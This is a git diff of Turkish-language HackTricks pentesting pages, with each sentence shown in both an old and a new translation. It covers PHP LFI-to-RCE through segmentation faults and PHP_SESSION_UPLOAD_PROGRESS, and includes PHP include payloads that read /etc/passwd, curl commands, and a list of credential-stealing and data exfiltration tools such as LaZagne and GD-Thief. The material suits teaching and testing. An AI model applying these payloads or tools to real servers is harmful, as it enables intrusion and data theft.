@ -90,18 +81,19 @@ You can check their website and try their engine for **free** at:
<div data-gb-custom-block data-tag="embed" data-url='https://whiteintel.io'></div>
{% hint style="success" %}
Learn & practice AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
Learn & practice GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
<summary>Support HackTricks</summary>
Other ways to support HackTricks:
* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
</details>
{% endhint %}
```

View file

@ -1,20 +1,21 @@
# LFI2RCE via Segmentasyon Hatası
{% hint style="success" %}
AWS Hacking'i öğrenin ve uygulayın: <img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Eğitim AWS Kırmızı Takım Uzmanı (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
GCP Hacking'i öğrenin ve uygulayın: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Eğitim GCP Kırmızı Takım Uzmanı (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>AWS hacklemeyi sıfırdan kahraman seviyesine öğrenin</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Kırmızı Takım Uzmanı)</strong></a><strong>!</strong></summary>
<summary>HackTricks'i Destekleyin</summary>
HackTricks'ı desteklemenin diğer yolları:
* **Şirketinizi HackTricks'te reklamını görmek isterseniz** veya **HackTricks'i PDF olarak indirmek isterseniz** [**ABONELİK PLANLARINA**](https://github.com/sponsors/carlospolop) göz atın!
* [**Resmi PEASS & HackTricks ürünlerini**](https://peass.creator-spring.com) edinin
* [**The PEASS Ailesi'ni**](https://opensea.io/collection/the-peass-family) keşfedin, özel [**NFT'lerimiz**](https://opensea.io/collection/the-peass-family) koleksiyonumuz
* 💬 [**Discord grubuna**](https://discord.gg/hRep4RUj7f) veya [**telegram grubuna**](https://t.me/peass) **katılın** veya **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**'ı takip edin**.
* **Hacking hilelerinizi** [**HackTricks**](https://github.com/carlospolop/hacktricks) ve [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github reposuna **PR göndererek paylaşın**.
* [**Abonelik planlarını**](https://github.com/sponsors/carlospolop) kontrol edin!
* 💬 [**Discord grubuna**](https://discord.gg/hRep4RUj7f) katılın veya [**telegram grubuna**](https://t.me/peass) katılın veya bizi **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)** takip edin.**
* **Hacking püf noktalarını paylaşarak PR göndererek** [**HackTricks**](https://github.com/carlospolop/hacktricks) ve [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github depolarına katkıda bulunun.
</details>
{% endhint %}
[https://spyclub.tech/2018/12/21/one-line-and-return-of-one-line-php-writeup/](https://spyclub.tech/2018/12/21/one-line-and-return-of-one-line-php-writeup/) (ikinci bölüm) ve [https://hackmd.io/@ZzDmROodQUynQsF9je3Q5Q/rJlfZva0m?type=view](https://hackmd.io/@ZzDmROodQUynQsF9je3Q5Q/rJlfZva0m?type=view) yazılarına göre, aşağıdaki payloadlar PHP'de bir segmentasyon hatasına neden olmuştur:
Writeup'lara göre [https://spyclub.tech/2018/12/21/one-line-and-return-of-one-line-php-writeup/](https://spyclub.tech/2018/12/21/one-line-and-return-of-one-line-php-writeup/) (ikinci bölüm) ve [https://hackmd.io/@ZzDmROodQUynQsF9je3Q5Q/rJlfZva0m?type=view](https://hackmd.io/@ZzDmROodQUynQsF9je3Q5Q/rJlfZva0m?type=view), aşağıdaki yükler PHP'de bir segmentasyon hatasına neden oldu:
```php
// PHP 7.0
include("php://filter/string.strip_tags/resource=/etc/passwd");
@ -22,9 +23,9 @@ include("php://filter/string.strip_tags/resource=/etc/passwd");
// PHP 7.2
include("php://filter/convert.quoted-printable-encode/resource=data://,%bfAAAAAAAAAAAAAAAAAAAAAAA%ff%ff%ff%ff%ff%ff%ff%ffAAAAAAAAAAAAAAAAAAAAAAAA");
```
Bilmelisiniz ki, bir **dosya içeren** bir **POST** isteği **gönderirseniz**, PHP bu dosyanın içeriğiyle birlikte `/tmp/php<birşey>` dizininde geçici bir dosya oluşturur. Bu dosya istek işlendikten sonra **otomatik olarak silinir**.
Eğer bir **POST** isteği **gönderirseniz** ve içinde bir **dosya bulunuyorsa**, PHP o dosyanın içeriğiyle birlikte `/tmp/php<something>` dizininde geçici bir dosya oluşturacaktır. Bu dosya, istek işlendikten sonra **otomatik olarak silinecektir**.
Bir **LFI** bulursanız ve PHP'de bir **segmentasyon hatası tetiklemeyi başarırsanız**, geçici dosya **asla silinmez**. Bu nedenle, LFI zafiyetiyle bu dosyayı bulabilir ve keyfi kodu çalıştırabilirsiniz.
Bir **LFI** bulursanız ve PHP'de bir **segmentasyon hatası oluşturmayı başarırsanız**, geçici dosya **asla silinmeyecektir**. Bu nedenle, **LFI** zafiyeti ile o dosyayı bulabilir ve keyfi kodları çalıştırabilirsiniz.
Test için [https://hub.docker.com/r/easyengine/php7.0](https://hub.docker.com/r/easyengine/php7.0) docker imajını kullanabilirsiniz.
```python
@ -69,16 +70,17 @@ bruteforce(charset)
if __name__ == "__main__":
main()
```
{% hint style="success" %}
AWS Hacking'ı öğrenin ve uygulayın: <img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Eğitim AWS Kırmızı Takım Uzmanı (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
GCP Hacking'ı öğrenin ve uygulayın: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Eğitim GCP Kırmızı Takım Uzmanı (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>Sıfırdan kahraman olmak için AWS hackleme öğrenin</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Kırmızı Takım Uzmanı)</strong></a><strong>!</strong></summary>
<summary>HackTricks'i Destekleyin</summary>
HackTricks'ı desteklemenin diğer yolları:
* **Şirketinizi HackTricks'te reklamını görmek** veya **HackTricks'i PDF olarak indirmek** için [**ABONELİK PLANLARI'na**](https://github.com/sponsors/carlospolop) göz atın!
* [**Resmi PEASS & HackTricks ürünlerini**](https://peass.creator-spring.com) edinin
* [**The PEASS Ailesi'ni**](https://opensea.io/collection/the-peass-family) keşfedin, özel [**NFT'lerimiz**](https://opensea.io/collection/the-peass-family) koleksiyonumuz
* 💬 [**Discord grubuna**](https://discord.gg/hRep4RUj7f) veya [**telegram grubuna**](https://t.me/peass) **katılın** veya **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**'ı takip edin**.
* **Hacking hilelerinizi** [**HackTricks**](https://github.com/carlospolop/hacktricks) ve [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github depolarına **PR göndererek paylaşın**.
* [**Abonelik planlarını**](https://github.com/sponsors/carlospolop) kontrol edin!
* 💬 [**Discord grubuna**](https://discord.gg/hRep4RUj7f) katılın veya [**telegram grubuna**](https://t.me/peass) katılın veya bizi **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)** takip edin.**
* **Hacking püf noktalarını paylaşarak PR göndererek HackTricks** ve **HackTricks Cloud** github depolarına katkıda bulunun.
</details>
{% endhint %}

View file

@ -1,22 +1,23 @@
# PHP\_SESSION\_UPLOAD\_PROGRESS ile LFI2RCE
# LFI2RCE via PHP\_SESSION\_UPLOAD\_PROGRESS
{% hint style="success" %}
AWS Hacking'i öğrenin ve uygulayın:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Eğitim AWS Kırmızı Takım Uzmanı (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
GCP Hacking'i öğrenin ve uygulayın: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Eğitim GCP Kırmızı Takım Uzmanı (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>AWS hacklemeyi sıfırdan kahraman olmak için öğrenin</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
<summary>HackTricks'i Destekleyin</summary>
HackTricks'i desteklemenin diğer yolları:
* **Şirketinizi HackTricks'te reklamını görmek** veya **HackTricks'i PDF olarak indirmek** için [**ABONELİK PLANLARINI**](https://github.com/sponsors/carlospolop) kontrol edin!
* [**Resmi PEASS & HackTricks ürünlerini**](https://peass.creator-spring.com) edinin
* Özel [**NFT'lerden**](https://opensea.io/collection/the-peass-family) oluşan koleksiyonumuz [**The PEASS Family**](https://opensea.io/collection/the-peass-family)'i keşfedin
* 💬 [**Discord grubuna**](https://discord.gg/hRep4RUj7f) veya [**telegram grubuna**](https://t.me/peass) **katılın** veya bizi **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**'da takip edin**.
* **Hacking hilelerinizi** [**HackTricks**](https://github.com/carlospolop/hacktricks) ve [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github depolarına **PR göndererek paylaşın**.
* [**Abonelik planlarını**](https://github.com/sponsors/carlospolop) kontrol edin!
* 💬 [**Discord grubuna**](https://discord.gg/hRep4RUj7f) katılın veya [**telegram grubuna**](https://t.me/peass) katılın veya bizi **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)** takip edin**.
* **HackTricks** ve **HackTricks Cloud** github depolarına PR göndererek hacking püf noktalarını paylaşın.
</details>
{% endhint %}
## Temel Bilgiler
Eğer bir **Yerel Dosya Dahil Etme (LFI)** bulduysanız ve **bir oturumunuz yoksa** ve `session.auto_start` `Off` ise. Eğer **`session.upload_progress.enabled`** **`On`** ise ve **`PHP_SESSION_UPLOAD_PROGRESS`**'u **multipart POST** verilerinde sağlarsanız, PHP sizin için oturumu **etkinleştirecektir**.
Eğer bir **Yerel Dosya Dahil Etme** bulduysanız ve **bir oturumunuz yoksa** ve `session.auto_start` `Off` ise bile. Eğer **`session.upload_progress.enabled`** **`On`** ise ve **`PHP_SESSION_UPLOAD_PROGRESS`**'i **multipart POST** verilerinde sağlarsanız, PHP **oturumu sizin için etkinleştirecektir**.
```bash
$ curl http://127.0.0.1/ -H 'Cookie: PHPSESSID=iamorange'
$ ls -a /var/lib/php/sessions/
@ -30,33 +31,34 @@ $ ls -a /var/lib/php/sessions/
In the last example the session will contain the string blahblahblah
```
**`PHP_SESSION_UPLOAD_PROGRESS`** ile oturum içindeki verileri kontrol edebilirsiniz, bu nedenle oturum dosyanızı dahil ederseniz kontrol ettiğiniz bir bölümü (örneğin bir php kabuk kodu) dahil edebilirsiniz.
**`PHP_SESSION_UPLOAD_PROGRESS`** ile **oturum içindeki verileri kontrol edebilirsiniz**, bu nedenle oturum dosyanızı dahil ederseniz kontrol ettiğiniz bir bölümü dahil edebilirsiniz (örneğin bir php kabuk kodu).
{% hint style="info" %}
İnternet'teki çoğu öğretici, hata ayıklama amacıyla `session.upload_progress.cleanup`'ı `Off` olarak ayarlamanızı önerir. Ancak PHP'nin varsayılan `session.upload_progress.cleanup` değeri hala `On` dur. Bu, oturumda yükleme ilerlemenizin mümkün olan en kısa sürede temizleneceği anlamına gelir. Bu yüzden bu bir **Yarış Koşulu** olacaktır.
İnternet üzerindeki çoğu öğretici, hata ayıklama amacıyla `session.upload_progress.cleanup`'ı `Off` olarak ayarlamanızı önerse de, PHP'deki varsayılan `session.upload_progress.cleanup` hala `On` dur. Bu, oturumdaki yükleme ilerlemenizin mümkün olan en kısa sürede temizleneceği anlamına gelir. Bu nedenle bu bir **Yarış Koşulu** olacaktır.
{% endhint %}
### CTF
Bu tekniğin yorumlandığı [**orijinal CTF**](https://blog.orange.tw/2018/10/) 'de, Yarış Koşulunu sömürmek yeterli değildi, yüklenen içeriğin ayrıca `@<?php` dizesiyle başlaması gerekiyordu.
Bu tekniğin yorumlandığı [**orijinal CTF**](https://blog.orange.tw/2018/10/) 'de, Yarış Koşulunu sömürmek yeterli olmadı, ayrıca yüklenen içeriğin `@<?php` dizesiyle başlaması gerekiyordu.
`session.upload_progress.prefix`'in varsayılan ayarı nedeniyle, **OTURUM dosyamız bir rahatsız edici önekle başlayacak** `upload_progress_` Örneğin: `upload_progress_controlledcontentbyattacker`
`session.upload_progress.prefix`'in varsayılan ayarı nedeniyle, **OTURUM dosyamız can sıkıcı bir önekle başlayacak** `upload_progress_` Örneğin: `upload_progress_controlledcontentbyattacker`
Başlangıç öneki **kaldırmak için** hileyi **payload'ı 3 kez base64 kodlamak** ve ardından `convert.base64-decode` filtreleri aracılığıyla kodlamaktı, çünkü **base64 kod çözme PHP, garip karakterleri kaldırır**, bu yüzden 3 kez sonra sadece saldırgan tarafından gönderilen **payload** **kalır** (ve ardından saldırgan başlangıç kısmını kontrol edebilir).
Başlangıç önekini **kaldırmak için** hileyi **payload'ı 3 kez base64encode etmek** ve ardından `convert.base64-decode` filtreleri aracılığıyla kodlamak oldu, çünkü **base64 kodunu çözerken PHP garip karakterleri kaldıracaktır**, bu nedenle 3 kezden sonra **sadece** saldırgan tarafından **gönderilen payload** **kalacak** (ve ardından saldırgan başlangıç kısmı kontrol edebilecektir).
Daha fazla bilgi için orijinal yazıya [https://blog.orange.tw/2018/10/](https://blog.orange.tw/2018/10/) ve son saldırıya [https://github.com/orangetw/My-CTF-Web-Challenges/blob/master/hitcon-ctf-2018/one-line-php-challenge/exp\_for\_php.py](https://github.com/orangetw/My-CTF-Web-Challenges/blob/master/hitcon-ctf-2018/one-line-php-challenge/exp\_for\_php.py) adresinden ulaşabilirsiniz.\
Başka bir yazıya [https://spyclub.tech/2018/12/21/one-line-and-return-of-one-line-php-writeup/](https://spyclub.tech/2018/12/21/one-line-and-return-of-one-line-php-writeup/) ulaşabilirsiniz.
Daha fazla bilgi için orijinal yazıda [https://blog.orange.tw/2018/10/](https://blog.orange.tw/2018/10/) ve nihai saldırı [https://github.com/orangetw/My-CTF-Web-Challenges/blob/master/hitcon-ctf-2018/one-line-php-challenge/exp\_for\_php.py](https://github.com/orangetw/My-CTF-Web-Challenges/blob/master/hitcon-ctf-2018/one-line-php-challenge/exp\_for\_php.py)\
Başka bir yazıda [https://spyclub.tech/2018/12/21/one-line-and-return-of-one-line-php-writeup/](https://spyclub.tech/2018/12/21/one-line-and-return-of-one-line-php-writeup/)
{% hint style="success" %}
AWS Hacking öğrenin ve uygulayın:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Eğitim AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
GCP Hacking öğrenin ve uygulayın: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Eğitim GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>AWS hacklemeyi sıfırdan kahraman olmak için</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>'ı öğrenin!</strong></summary>
<summary>HackTricks'i Destekleyin</summary>
HackTricks'i desteklemenin diğer yolları:
* Şirketinizi HackTricks'te **reklamınızı görmek veya HackTricks'i PDF olarak indirmek** için [**ABONELİK PLANLARINI**](https://github.com/sponsors/carlospolop) kontrol edin!
* [**Resmi PEASS & HackTricks ürünlerini**](https://peass.creator-spring.com) edinin
* Özel [**NFT'lerden**](https://opensea.io/collection/the-peass-family) oluşan koleksiyonumuz olan [**The PEASS Family**](https://opensea.io/collection/the-peass-family)'yi keşfedin
* 💬 [**Discord grubuna**](https://discord.gg/hRep4RUj7f) veya [**telegram grubuna**](https://t.me/peass) **katılın** veya bizi **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**'ı takip edin.**
* **Hacking hilelerinizi** [**HackTricks**](https://github.com/carlospolop/hacktricks) ve [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github reposuna **PR göndererek** paylaşın.
* [**Abonelik planlarını**](https://github.com/sponsors/carlospolop) kontrol edin!
* 💬 [**Discord grubuna**](https://discord.gg/hRep4RUj7f) katılın veya [**telegram grubuna**](https://t.me/peass) katılın veya bizi **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)** takip edin.**
* **Hacking püf noktalarını paylaşarak PR'ler göndererek** [**HackTricks**](https://github.com/carlospolop/hacktricks) ve [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github depolarına katkıda bulunun.
</details>
{% endhint %}

View file

@ -1,31 +1,33 @@
# Tarayıcı HTTP İstek Smugglingi
# Tarayıcı HTTP İstek Karıştırma
{% hint style="success" %}
AWS Hacking'i öğrenin ve uygulayın: <img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Eğitim AWS Kırmızı Takım Uzmanı (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
GCP Hacking'i öğrenin ve uygulayın: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Eğitim GCP Kırmızı Takım Uzmanı (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>AWS hackleme konusunda sıfırdan kahramana dönüşmek için</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Kırmızı Takım Uzmanı)</strong></a><strong>'ı öğrenin!</strong></summary>
<summary>HackTricks'i Destekleyin</summary>
HackTricks'i desteklemenin diğer yolları:
* Şirketinizi **HackTricks'te reklamını görmek** veya **HackTricks'i PDF olarak indirmek** için [**ABONELİK PLANLARINI**](https://github.com/sponsors/carlospolop) kontrol edin!
* [**Resmi PEASS & HackTricks ürünlerini**](https://peass.creator-spring.com) edinin
* Özel [**NFT'lerden**](https://opensea.io/collection/the-peass-family) oluşan koleksiyonumuz [**The PEASS Family**](https://opensea.io/collection/the-peass-family)'i keşfedin
* 💬 [**Discord grubuna**](https://discord.gg/hRep4RUj7f) veya [**telegram grubuna**](https://t.me/peass) **katılın** veya **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)'ı takip edin**
* **Hacking hilelerinizi** [**HackTricks**](https://github.com/carlospolop/hacktricks) ve [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github depolarına **PR göndererek paylaşın**.
* [**Abonelik planlarını**](https://github.com/sponsors/carlospolop) kontrol edin!
* 💬 [**Discord grubuna**](https://discord.gg/hRep4RUj7f) katılın veya [**telegram grubuna**](https://t.me/peass) katılın veya bizi **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)** takip edin.**
* **Hacking püf noktalarını paylaşarak PR'ler göndererek** [**HackTricks**](https://github.com/carlospolop/hacktricks) ve [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github depolarına katkıda bulunun.
</details>
{% endhint %}
**Gönderiyi kontrol edin [https://portswigger.net/research/browser-powered-desync-attacks](https://portswigger.net/research/browser-powered-desync-attacks)**
{% hint style="success" %}
AWS Hacking'i öğrenin ve uygulayın: <img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Eğitim AWS Kırmızı Takım Uzmanı (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
GCP Hacking'i öğrenin ve uygulayın: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Eğitim GCP Kırmızı Takım Uzmanı (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>AWS hackleme konusunda sıfırdan kahramana dönüşmek için</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Kırmızı Takım Uzmanı)</strong></a><strong>'ı öğrenin!</strong></summary>
<summary>HackTricks'i Destekleyin</summary>
HackTricks'i desteklemenin diğer yolları:
* Şirketinizi **HackTricks'te reklamını görmek** veya **HackTricks'i PDF olarak indirmek** için [**ABONELİK PLANLARINI**](https://github.com/sponsors/carlospolop) kontrol edin!
* [**Resmi PEASS & HackTricks ürünlerini**](https://peass.creator-spring.com) edinin
* Özel [**NFT'lerden**](https://opensea.io/collection/the-peass-family) oluşan koleksiyonumuz [**The PEASS Family**](https://opensea.io/collection/the-peass-family)'i keşfedin
* 💬 [**Discord grubuna**](https://discord.gg/hRep4RUj7f) veya [**telegram grubuna**](https://t.me/peass) **katılın** veya **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)'ı takip edin**
* **Hacking hilelerinizi** [**HackTricks**](https://github.com/carlospolop/hacktricks) ve [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github depolarına **PR göndererek paylaşın**.
* [**Abonelik planlarını**](https://github.com/sponsors/carlospolop) kontrol edin!
* 💬 [**Discord grubuna**](https://discord.gg/hRep4RUj7f) katılın veya [**telegram grubuna**](https://t.me/peass) katılın veya bizi **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)** takip edin.**
* **Hacking püf noktalarını paylaşarak PR'ler göndererek** [**HackTricks**](https://github.com/carlospolop/hacktricks) ve [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github depolarına katkıda bulunun.
</details>
{% endhint %}

View file

@ -1,27 +1,43 @@
{% hint style="success" %}
Öğren ve AWS Hacking pratiği yap:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Eğitim AWS Kırmızı Takım Uzmanı (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
Öğren ve GCP Hacking pratiği yap: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Eğitim GCP Kırmızı Takım Uzmanı (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>AWS hackleme becerilerini sıfırdan kahraman seviyesine öğrenin</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Kırmızı Takım Uzmanı)</strong></a><strong>!</strong></summary>
<summary>HackTricks'i Destekle</summary>
HackTricks'ı desteklemenin diğer yolları:
* Şirketinizi HackTricks'te **reklamını görmek** veya HackTricks'i **PDF olarak indirmek** için [**ABONELİK PLANLARINI**](https://github.com/sponsors/carlospolop) kontrol edin!
* [**Resmi PEASS & HackTricks ürünlerini**](https://peass.creator-spring.com) edinin
* [**The PEASS Ailesi'ni**](https://opensea.io/collection/the-peass-family) keşfedin, özel [**NFT'lerimiz**](https://opensea.io/collection/the-peass-family) koleksiyonumuz
* 💬 [**Discord grubuna**](https://discord.gg/hRep4RUj7f) veya [**telegram grubuna**](https://t.me/peass) **katılın** veya bizi **Twitter'da** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)** takip edin**.
* **Hacking hilelerinizi** [**HackTricks**](https://github.com/carlospolop/hacktricks) ve [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github depolarına **PR göndererek paylaşın**.
* [**Abonelik planlarını**](https://github.com/sponsors/carlospolop) kontrol et!
* 💬 [**Discord grubuna**](https://discord.gg/hRep4RUj7f) katıl veya [**telegram grubuna**](https://t.me/peass) katıl veya bizi **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)** takip et.**
* **Hacking püf noktalarını paylaşmak için PR'lar göndererek** [**HackTricks**](https://github.com/carlospolop/hacktricks) ve [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github depolarına katkıda bulun.
</details>
{% endhint %}
## **Yerel l00t**
## **Yerel Ganimet**
* [**PEASS-ng**](https://github.com/carlospolop/PEASS-ng): Bu betikler, PE vektörlerini aramakla kalmayıp, dosya sistemi içinde hassas bilgileri de arayacak.
* [**LaZagne**](https://github.com/AlessandroZ/LaZagne): **LaZagne projesi**, yerel bir bilgisayarda depolanan birçok parolayı almak için kullanılan açık kaynaklı bir uygulamadır. Her yazılım, parolalarını farklı teknikler kullanarak (düz metin, API'ler, özel algoritmalar, veritabanları vb.) depolar. Bu araç, en yaygın olarak kullanılan yazılımların bu parolalarını bulmak amacıyla geliştirilmiştir.
* [**PEASS-ng**](https://github.com/carlospolop/PEASS-ng): Bu betikler, PE vektörlerini aramakla kalmayıp dosya sistemi içinde hassas bilgiler arayacak.
* [**LaZagne**](https://github.com/AlessandroZ/LaZagne): **LaZagne projesi**, yerel bir bilgisayarda depolanan birçok şifreyi almak için kullanılan açık kaynaklı bir uygulamadır. Her yazılım, şifrelerini farklı tekniklerle (açık metin, API'ler, özel algoritmalar, veritabanları vb.) depolar. Bu araç, en yaygın kullanılan yazılımlar için bu şifreleri bulmak amacıyla geliştirilmiştir.
## **Harici Hizmetler**
* [**Conf-Thief**](https://github.com/antman1p/Conf-Thief): Bu Modül, bir erişim belirteci kullanarak Confluence'nin API'sine bağlanacak, PDF'ye dönüştürecek ve hedefin erişimi olan Confluence belgelerini indirecektir.
* [**GD-Thief**](https://github.com/antman1p/GD-Thief): Hedefinize (saldırgan olarak) erişiminiz olan bir hedefin Google Drive'ından dosyaları çıkarmak için Kırmızı Takım aracıdır. Bu, tüm paylaşılan dosyaları, paylaşılan sürücülerden tüm dosyaları ve hedefin erişimi olan alan sürücülerinden tüm dosyaları içerir.
* [**GDir-Thief**](https://github.com/antman1p/GDir-Thief): Hedef kuruluşun Google Kişi Dizini'ni, erişiminiz olan Google Kişi API'si aracılığıyla çıkarmak için Kırmızı Takım aracıdır.
* [**SlackPirate**](https://github.com/emtunc/SlackPirate)**:** Bu, bir erişim belirteci verildiğinde, yerel bir Slack çalışma alanından 'ilginç' bilgileri çıkarmak için yerleşik Slack API'lerini kullanan Python'da geliştirilmiş bir araçtır.
* [**Slackhound**](https://github.com/BojackThePillager/Slackhound): Slackhound, bir Slack çalışma alanının/organizasyonunun keşfini hızlı bir şekilde yapmak için kırmızı ve mavi takımların kullanabileceği bir komut satırı aracıdır. Slackhound, bir organizasyonun kullanıcılarını, dosyalarını, mesajlarını vb. hızlı bir şekilde aranabilir hale getirir ve büyük nesneler çevrimdışı gözden geçirme için CSV'ye yazılır.
* [**Conf-Thief**](https://github.com/antman1p/Conf-Thief): Bu Modül, hedefin erişimine sahip olduğunuz Confluence'nin API'sine bağlanacak, PDF'ye aktaracak ve Confluence belgelerini indirecektir.
* [**GD-Thief**](https://github.com/antman1p/GD-Thief): Kırmızı Takım aracı, hedefin Google Drive'ından (saldırganın erişimine sahip olduğu) dosyaları Google Drive API'si aracılığıyla dışa aktarmak için kullanılır. Bu, tüm paylaşılan dosyaları, paylaşılan sürücülerden tüm dosyaları ve hedefin erişimine sahip olduğu etki alanı sürücülerinden tüm dosyaları içerir.
* [**GDir-Thief**](https://github.com/antman1p/GDir-Thief): Kırmızı Takım aracı, erişiminiz olan hedef organizasyonunun Google Kişiler Dizinini Google'ın Kişiler API'si aracılığıyla dışa aktarmak için kullanılır.
* [**SlackPirate**](https://github.com/emtunc/SlackPirate)**:** Bu, bir erişim belirteci verildiğinde bir Slack çalışma alanından 'ilginç' bilgileri çıkarmak için yerel Slack API'lerini kullanan Python'da geliştirilmiş bir araçtır.
* [**Slackhound**](https://github.com/BojackThePillager/Slackhound): Slackhound, bir Slack çalışma alanının/organizasyonunun hızlı bir şekilde keşfini yapmak için kırmızı ve mavi takımlar için bir komut satırı aracıdır. Slackhound, bir organizasyonun kullanıcılarını, dosyalarını, mesajlarını vb. hızlı bir şekilde aranabilir hale getirir ve büyük nesneler çevrimdışı inceleme için CSV'ye yazılır.
{% hint style="success" %}
